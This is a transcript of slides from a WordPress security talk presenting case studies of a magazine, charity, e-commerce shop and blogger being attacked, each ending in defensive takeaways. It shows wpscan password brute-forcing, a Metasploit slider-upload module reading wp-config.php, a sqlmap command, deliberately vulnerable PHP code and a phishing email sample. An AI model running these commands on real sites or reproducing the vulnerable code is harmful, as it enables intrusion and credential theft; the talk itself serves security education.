Come to the dark side, they have cookies

Transcript

1. TIM NASH @tnash Come to the dark side They have

   cookies...

2. What's the worst that can happen?

3. None
4. None
5. None

6. Client email Hi, we are going to be on the

   One Show in about two hours. Do you need to do anything?

7. ruby wpscan.rb --url

8. Intelligence gathering is fun!

9. None

10. function df_save_options() { $fields = $_REQUEST; foreach($fields as $key =>

    $field) { if($key!="action") { echo $key."-".$field; update_option($key,$field); } } die(); } Totally legit...
11. None
12. None

13. WordPress Platform Lead 
 at 34SP.com Former Pen Tester co-run

    WordPress Leeds Ran a small dev agency Speaks about security 
 around the country

14. Take aways from TV wonder Use a child theme Regularly

    code audit Have control of your WAF Get a disaster plan in place

15. Magazine Hack

16. Small print firm moved online Mom and Pop shop
 Uses

    a single WordPress site Shared hosting
 No in house "dev" team

17. ruby wpscan.rb --url magazine-company.com 
 --wordlist timspassword.dict --username admin

18. ruby wpscan.rb --url magazine-company.com 
 --enumerate p

19. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt

20. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt
21. None

22. /wp/wp-json/v2/users

23. None

24. 6eefb55db48f21dde991e2694dda58fd 
 ==
 [email protected] ???

25. Typical WordPress update email

26. Please update your site at timstest.ismysite.co.uk to WordPress 4.9.7. Updating

    with Jetpack installed is easy and only takes a few moments: https://jetpack-wordpress.com/update/ timstest.isymsite.co.uk If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help. https://wordpress.org/support/ Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers. The WordPress Team

27. Friendly familiar login.... Pre populated username whats
 missing?

28. The actual wp.com login

29. >> From: WordPress.com <[email protected]> >> Date: 21 September 2018 at

    05:18:53 BST >> To: [email protected] >> Subject: wordpress database upgrade required ! >> >> >> >> DataBase Upgrade Required >> >> Dear Customer, >> >> Your WordPress database is out-of-date, and must be upgrade before 29/09/2018. >> >> The upgrade process may take a while, so please be patient. >> >> Click here to Upgrade Wordpress >> >> >> Download our free mobile app today. >> View stats, moderate comments, create and edit posts, and upload media. >> Click here to learn more. >> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110

30. Take aways from our spear phishing attack Never click untrusted

    links Enable two-factor authentication Limit administrator users Don't use the same password on ever site
31. None

32. Charity Hack

33. Watford Children Charity Separated Brochure site Sharepoint/Exchange Server on site

    IT Manager 3rd party developers for site
34. None

35. use exploit/shell/divi_revslider_shell_upload
 set watfordcharity.com
 set payload exec
 set cmd cat

    wp-config.php

36. <?php .... // ** MySQL settings ** // /** The

    name of the database for WordPress */ define( 'DB_NAME', 'watford' ); /** MySQL database username */ define( 'DB_USER', 'watford' ); /** MySQL database password */ define( 'DB_PASSWORD', 'totallysecure' ); /** MySQL hostname */ define( 'DB_HOST', 'db.watfordcharity.com' );

37. set cmd "ls wp-content/plugins"

38. What's the worst that can happen?

39. What's the worst that can happen?

40. None

41. Take aways from our slider attack Always keep things up

    to date Never rely on themes licenses to get bundled plugins The DB is not a safe place to store credentials

42. E-Commerce Site Hack

43. E-commerce site hack WooCommerce Powered Hop 100s of customers Small

    Dev Team Custom Theme and a range of plugins

44. https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

45. python sqlmap.py -u https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

46. <?php .... define('SHORTINIT', true); // load minimal WordPress require_once '../../../wp-load.php';

    // WordPress loader

47. <?php .... $result = $wpdb->query("SELECT * FROM `{$tablename}` where `css_source`={$id}");

48. <?php .... $id = $_GET['ID']

49. Take aways from our SQL attack Custom Code is our

    responsibility Never Rely on a WAF thats in the application Always check endpoints for SQL injections

50. Poisoning the well Small blogger Running WordPress the first time

    Get's supports mainly from Facebook forums

51. Without trust we can't have security...

52. Take aways from our poison well If someone says there

    an issue, DO NOT DISMISS IT Help people to understand security Security is everyone responsibility

53. Security is your responsibility

54. A bad actor needs to be right once....

55. We need to be right all the time!

56. TIM NASH @tnash | timnash.co.uk/security Thank you very much!